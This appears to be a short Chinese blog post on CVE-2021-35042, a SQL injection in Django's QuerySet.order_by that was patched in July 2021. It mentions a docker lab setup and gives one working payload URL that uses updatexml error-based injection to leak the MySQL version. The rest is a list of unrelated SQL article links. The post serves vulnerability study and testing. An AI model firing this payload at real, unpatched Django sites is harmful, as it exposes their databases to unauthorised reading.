漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
@小柯555m3 小时前
MySql(高级操作符--高级操作符练习(2))Mr_linjw4 小时前
MySQL 中监控和优化慢 SQL & 索引小知识雾岛听风6914 小时前
Sql server橙子圆1235 小时前
Mybatis之动态sqlMuyuan19985 小时前
26.Paper RAG Agent 展示面收口:截图与项目表达更新记录hsD5mSMu55 小时前
从零开始学Flink:Flink SQL 极简入门许彰午6 小时前
我手写了一个 Java 内存数据库(四):索引引擎、SQL 解析与总结Irene19916 小时前
SQL 有效性/作用域说明:会话级别、事务级别,语句级别数据库小学妹6 小时前
锁机制(Locking):解决数据库“死锁”与“阻塞”的终极指南雷工笔记7 小时前
用AI解决SQL语句解析及语法转换问题